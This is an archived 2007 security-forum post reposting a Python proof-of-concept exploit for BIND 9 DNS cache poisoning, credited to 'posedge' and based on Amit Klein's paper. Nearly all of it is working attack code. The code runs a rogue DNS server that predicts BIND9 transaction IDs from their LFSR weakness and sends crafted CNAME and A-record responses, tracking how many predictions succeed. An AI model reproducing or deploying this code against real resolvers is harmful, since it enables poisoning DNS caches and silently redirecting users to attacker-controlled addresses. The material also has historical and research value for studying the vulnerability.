邪恶八进制信息安全团队技术讨论组's Archiver

ring04h 2007-8-12 12:49

BIND 9 DNS Cache Poisoning Exploit (v0.3beta)

[code]#!/usr/bin/env python

"""
DNS Cache Poison v0.3beta by posedge
based on the Amit Klein paper: [url]http://www.trusteer.com/docs/bind9dns.html[/url]

output: <time>:<ip>:<port>: id: <id> q: <query> g: <good> e: <error>

id: ID to predict
q: number of queries from the DNS server (only queries with LSB at 0 in ID)
g: number of good predicted IDs
e: number of errors while trying to predict a *supposed to be* predicted ID
"""

import socket, select, sys, time
from struct import unpack, pack
from socket import htons

_ANSWER_TIME_LIMIT = 1.0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
        [<your_dns2_hostname>, <your_dns2_ip>], \
        [<etc>, <etc>]]

class BINDSimplePredict:
def __init__(self, txid, bind_9_2_3___9_4_1=True):
  self.txid = txid
  self.cand = []
  if bind_9_2_3___9_4_1 == True:
   # For BIND9 v9.2.3-9.4.1:
   self.tap1=0x80000057
   self.tap2=0x80000062
  else:
   # For BIND9 v9.0.0-9.2.2:
   self.tap1=0xc000002b # (0x80000057>>1)|(1<<31)
   self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31)
  self.next = self.run()
  return

def run(self):

  if (self.txid & 1) != 0:
   #print "info: LSB is not 0. Can&#39;t predict the next transaction ID."
   return False

  #print "info: LSB is 0, predicting..."

  # One bit shift (assuming the two lsb&#39;s are 0 and 0)
  for msb in xrange(0, 2):
   self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF)

  # Two bit shift (assuming the two lsb&#39;s are 1 and 1)
  # First shift (we know the lsb is 1 in both LFSRs):
  v=self.txid
  v=(v>>1)^self.tap1^self.tap2
  if (v & 1) == 0:
   # After the first shift, the lsb becomes 0, so the two LFSRs now have
   # identical lsb&#39;s: 0 and 0 or 1 and 1
   # Second shift:
   v1=(v>>1) # 0 and 0
   v2=(v>>1)^self.tap1^self.tap2 # 1 and 1
  else:
   # After the first shift, the lsb becomes 1, so the two LFSRs now have
   # different lsb&#39;s: 1 and 0 or 0 and 1
   # Second shift:
   v1=(v>>1)^self.tap1 # 1 and 0
   v2=(v>>1)^self.tap2 # 0 and 1

  # Also need to enumerate over the 2 msb&#39;s we are clueless about
  for msbits in xrange(0, 4):
   self.cand.append(((msbits<<14)|v1) & 0xFFFF)
   self.cand.append(((msbits<<14)|v2) & 0xFFFF)

  return True;

class DNSData:
def __init__(self, data):
  self.data=data
  self.name=&#39;&#39;

  for i in xrange(12, len(data)):
   self.name+=data[i]
   if data[i] == &#39;\x00&#39;:
    break
  q_type = unpack(">H", data[i+1:i+3])[0]
  if q_type != 1: # only type: A (host address) allowed.
   self.name = None
  return

def response(self, ip=None):
  packet=&#39;&#39;
  packet+=self.data[0:2] # id
  packet+="\x84\x10" # flags
  packet+="\x00\x01" # questions
  packet+="\x00\x01" # answer RRS
  packet+="\x00\x00" # authority RRS
  packet+="\x00\x00" # additional RRS
  packet+=self.name # queries: name
  packet+="\x00\x01" # queries: type (A)
  packet+="\x00\x01" # queries: class (IN)
  packet+="\xc0\x0c" # answers: name
  if ip == None:
   packet+="\x00\x05" # answers: type (CNAME)
   packet+="\x00\x01" # answers: class (IN)
   packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
   packet+=pack(">H", len(self.name)+2) # answers: data length
   packet+="\x01" + "x" + self.name # answers: primary name
  else:
   packet+="\x00\x01" # answers: type (A)
   packet+="\x00\x01" # answers: class (IN)
   packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
   packet+="\x00\x04" # answers: data length
   packet+=str.join(&#39;&#39;,map(lambda x: chr(int(x)), ip.split(&#39;.&#39;))) # IP
  #packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional
  return packet

class DNSServer:
def __init__(self):
  self.is_r = []
  self.is_w = []
  self.is_e = []
  self.targets = []
  self.named_conf = []
  
  for i in xrange(len(_NAMED_CONF)):
   start = 0
   tmp = &#39;&#39;
   for j in xrange(len(_NAMED_CONF[i][0])):
    if _NAMED_CONF[i][0][j] == &#39;.&#39;:
     tmp += chr(j - start)
     tmp += _NAMED_CONF[i][0][start:j]
     start = j + 1
   tmp += chr(j - start + 1)
   tmp += _NAMED_CONF[i][0][start:] + "\x00"
   self.named_conf.append([tmp, _NAMED_CONF[i][1]])
  return

def run(self):
  self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  self.s.bind((&#39;&#39;,53))
  self.is_r.append(self.s)
  next = False
  i = 0

  while 1:
   r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0)
   if r:
    try:
     data, addr = self.s.recvfrom(1024)
    except socket.error:
     continue

    txid = unpack(">H", data[0:2])[0]
    p=DNSData(data)
    if p.name == None:
     continue

    found = False

    for j in xrange(len(self.named_conf)):
     if p.name == self.named_conf[j][0]:
      found = True
      break

    if found == True:
     self.s.sendto(p.response(self.named_conf[j][1]), addr)
     continue

    # FIXME: wrong code, &#39;i&#39; is 0 at begin and when 1 item in list...
    for i in xrange(len(self.targets)):
     if self.targets[i][0] == addr[0]:
      break
    if i == len(self.targets):
     self.targets.append([addr[0], False, time.time(), [None, None], \
      None, 0, 0, 0])

    if self.targets[i][1] == False:
     bsp = BINDSimplePredict(txid)
     self.targets[i][1] = bsp.next
     self.targets[i][3][0] = bsp.cand
     bsp = BINDSimplePredict(txid, False)
     self.targets[i][3][1] = bsp.cand
    else:
     if p.name == self.targets[i][4]:
      elapsed = time.time() - self.targets[i][2]
      if elapsed > _ANSWER_TIME_LIMIT:
       print &#39;info: slow answer, discarding (%.2f sec)&#39; % elapsed
      else:
       self.targets[i][5] += 1
       found_v1 = False
       found_v2 = False
       for j in xrange(10):
        if self.targets[i][3][0][j] == txid:
         found_v1 = True
         break
        if self.targets[i][3][1][j] == txid:
         found_v2 = True
         break

       if found_v1 == True or found_v2 == True:
        self.targets[i][6] += 1
       else:
        self.targets[i][7] += 1

       # TODO: if found_v1 or found_v2 is True, then show bind version!
       print "\n" + str(i) + &#39; target:&#39;, self.targets
       print &#39;%f:%s:%d: id: %04x q: %d g: %d e: %d&#39; % (time.time(), \
        addr[0], addr[1], txid, self.targets[i][5], \
        self.targets[i][6], self.targets[i][7])
       self.targets[i][1] = False
    self.targets[i][2] = time.time()
    self.targets[i][4] = "\x01" + "x" + p.name
    self.s.sendto(p.response(), addr)
  return

def close(self):
  self.s.close()
  return

if __name__ == &#39;__main__&#39;:
dns_srv = DNSServer()

try:
  dns_srv.run()
except KeyboardInterrupt:
  print &#39;ctrl-c, leaving...&#39;
  dns_srv.close()

# milw0rm.com [2007-08-07]
[/code]

页: [1]
© 1999-2008 EvilOctal Security Team